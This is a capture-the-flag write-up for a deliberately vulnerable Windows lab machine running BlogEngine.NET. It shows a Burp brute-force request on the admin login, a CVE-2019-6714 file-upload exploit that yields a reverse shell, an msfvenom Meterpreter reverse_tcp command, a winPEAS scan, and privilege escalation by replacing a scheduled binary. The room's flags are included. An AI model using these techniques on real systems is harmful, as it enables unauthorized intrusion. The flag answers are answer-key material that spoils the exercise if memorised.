[Deploy the vulnerable Windows machine]

[*] Target: 10.10.191.176

[Question 1] Whats the name of the clown displayed on the homepage? => Pennywise

    [+] In the http://10.10.191.176/, you can see a quite creepy clown

        [>>] Using "Search image with Google", we know that is name is Pennywise


************************************************************************************************************************************************************************************************************************************************************


[Using Hydra to brute-force a login]

[*] Target: 10.10.191.176

[Question 1] What request type is the Windows website login form using? => POST

[Question 2] Choose a password wordlist and gain credentials to the "admin" account! => 1qaz2wsx

    [+] This just a brute force attack and Burp Suite Pro is much more user friendly, so 

        POST /Account/login.aspx?ReturnURL=%2fadmin%2f HTTP/1.1
        Host: 10.10.191.176
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 553
        Origin: http://10.10.191.176
        Connection: close
        Referer: http://10.10.191.176/Account/login.aspx?ReturnURL=/admin/
        Upgrade-Insecure-Requests: 1

        __VIEWSTATE=...

        ctl00%24MainContent%24LoginUser%24UserName=admin&
        ctl00%24MainContent%24LoginUser%24Password=§test§&
        ctl00%24MainContent%24LoginUser%24LoginButton=Log+in

    [Note] I used /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt

        [>>] admin:1qaz2wsx is the correct credential


************************************************************************************************************************************************************************************************************************************************************


[Compromise the machine]

[*] Target: 10.10.191.176

[Question 1] Now you have logged into the website, are you able to identify the version of the BlogEngine? => 3.3.6.0 

    [+] Nah! its version is stored in the http://10.10.191.176/admin/about.cshtml

        [>>] Version: 3.3.6.0 

[Question 2] What is the CVE? => CVE-2019-6714

    [+] With the keyword "BlogEngine 3.3.6.0 Exploit", you can easily see the CVE-2019-6714

[Question 3] Who is the webserver running as? => iis apppool\blog

    [!] CVE: CVE-2019-6714

        [+] This exploit takes advantage of a directory traversal vulnerability in BlogEngine.NET versions 3.3.6 and below, leading to remote code execution. 
        
        [+] The vulnerability resides in the "theme" parameter, which is used to override the default theme for rendering blog pages. 
        
        [+] The vulnerable code can be found in the file "/Custom/Controls/PostList.ascx.cs"

        [+] To exploit this vulnerability, follow these steps:

            [1] Set up a reverse TCP listener on your attack host that is waiting for a connection.

            [2] Access the admin page that allows file uploads (http://10.10.191.176/admin/app/editor/editpost.cshtml)

            [3] Upload the exploit file (named "PostView.ascx") through the file manager. This file should contain the code to establish a reverse TCP connection to your attack host.

                [Note] Remember to change to IP and PORT

            [4] After uploading, the file will be located in the "http://10.10.191.176/?theme=../../App_Data/files" directory off the document root.

                [>>] Finally, trigger the vulnerability by accessing the base URL for the blog with a theme override parameter

    # nc -lnvp 4444
        listening on [any] 4444 ...
        connect to [10.14.56.1] from (UNKNOWN) [10.10.191.176] 49267
        Microsoft Windows [Version 6.3.9600]
        (c) 2013 Microsoft Corporation. All rights reserved.

        >>> C:\windows\system32\inetsrv> whoami     
                iis apppool\blog    


************************************************************************************************************************************************************************************************************************************************************


[Windows Privilege Escalation] +  [Privilege Escalation Without Metasploit]

    [Note] These 2 sections have the same mindset so I combine them

[*] Target: 10.10.191.176

[Question 1] What is the OS version of this windows machine? => Windows 2012 R2 (6.3 Build 9600)

    [+] Our netcat session is a little unstable, so lets generate another reverse shell using msfvenom

        msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.14.56.1 lport=1234 -f exe > shell.exe

        [>>] I also upload this payload in the http://10.10.191.176/admin/app/editor/editpost.cshtml

    >>> C:\windows\system32\inetsrv>cd C:\

    >>> C:\>dir /s /b shell.exe
        C:\inetpub\wwwroot\App_Data\files\shell.exe

    >>> C:\>cd C:\inetpub\wwwroot\App_Data\files\

    >>> C:\inetpub\wwwroot\App_Data\files>.\shell.exe
 
        [>>] msf6 exploit(multi/handler) > run

            [*] Started reverse TCP handler on 10.14.56.1:1234 
            [*] Sending stage (200774 bytes) to 10.10.191.176
            [*] Meterpreter session 1 opened (10.14.56.1:1234 -> 10.10.191.176:49295) at 2023-07-10 17:30:46 +0800

            meterpreter > sysinfo
            Computer        : HACKPARK
            OS              : Windows 2012 R2 (6.3 Build 9600).
            Architecture    : x64
            System Language : en_US
            Domain          : WORKGROUP
            Logged On Users : 1
            Meterpreter     : x64/windows

[Question 2] What is the name of the abnormal service running? => WindowScheduler

    meterpreter > upload /usr/share/peass/winpeas/winPEASx64_ofs.exe
        [*] Uploading  : /usr/share/peass/winpeas/winPEASx64_ofs.exe -> winPEASx64_ofs.exe
        [*] Uploaded 1.80 MiB of 1.80 MiB (100.0%): /usr/share/peass/winpeas/winPEASx64_ofs.exe -> winPEASx64_ofs.exe
        [*] Completed  : /usr/share/peass/winpeas/winPEASx64_ofs.exe -> winPEASx64_ofs.exe
                                                                                                 
    C:\inetpub\wwwroot\App_Data\files>.\winPEASx64_ofs.exe
        ...
        RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
        Key: WScheduler
        Folder: C:\Program Files (x86)\SystemScheduler
        FolderPerms: Everyone [WriteData/CreateFiles]
        File: C:\PROGRA~2\SYSTEM~1\WScheduler.exe /LOGON
        FilePerms: Everyone [WriteData/CreateFiles]
        ...

[Question 3] What is the name of the binary you're supposed to exploit? => Message.exe

    [+] Okay =)) So we know that our target is WindowScheduler service

    [+] After 2 hour of searching, voila

    C:\PROGRA~2\SYSTEM~1\Events>type 20198415519.INI_LOG.txt 
        ...
        07/10/23 03:40:34,Process Ended. PID:3032,ExitCode:4,Message.exe (Administrator)
        07/10/23 03:41:01,Event Started Ok, (Administrator)
        07/10/23 03:41:33,Process Ended. PID:2280,ExitCode:4,Message.exe (Administrator)
        07/10/23 03:42:01,Event Started Ok, (Administrator)
        07/10/23 03:42:33,Process Ended. PID:1432,ExitCode:4,Message.exe (Administrator)
     
[Question 4] What is the user flag (on Jeffs Desktop)?

[Question 5] What is the root flag?

    meterpreter > cd C:\\PROGRA~2\\SYSTEM~1\\

    meterpreter > upload /home/bigbox/Desktop/Message.exe

        [*] Uploading  : /home/bigbox/Desktop/Message.exe -> Message.exe
        [*] Uploaded 7.00 KiB of 7.00 KiB (100.0%): /home/bigbox/Desktop/Message.exe -> Message.exe
        [*] Completed  : /home/bigbox/Desktop/Message.exe -> Message.exe

    => And after like 30s, the Message.exe is actived again => we got the shell 

        msf6 exploit(multi/handler) > run

        [*] Started reverse TCP handler on 10.14.56.1:31337 
        [*] Sending stage (200774 bytes) to 10.10.191.176
        [*] Meterpreter session 1 opened (10.14.56.1:31337 -> 10.10.191.176:49380) at 2023-07-10 18:53:06 +0800

        meterpreter > shell
            ...
            C:\Users\jeff\Desktop>type user.txt
                
                759bd8af507517bcfaede78a21a73e39
            ...
            C:\Users\Administrator\Desktop>type root.txt

                7e13d97f05f7ceb9881a3eb3d78d3e72

[Question 6] Using winPeas, what was the Original Install time? (This is date and time) => 8/3/2019, 10:43:23 AM 

    # You need to use the winPeas.bat to have this result
        ...                                                                              
        Product ID:                00252-70000-00000-AA886                                                                    
        Original Install Date:     8/3/2019, 10:43:23 AM  
        ...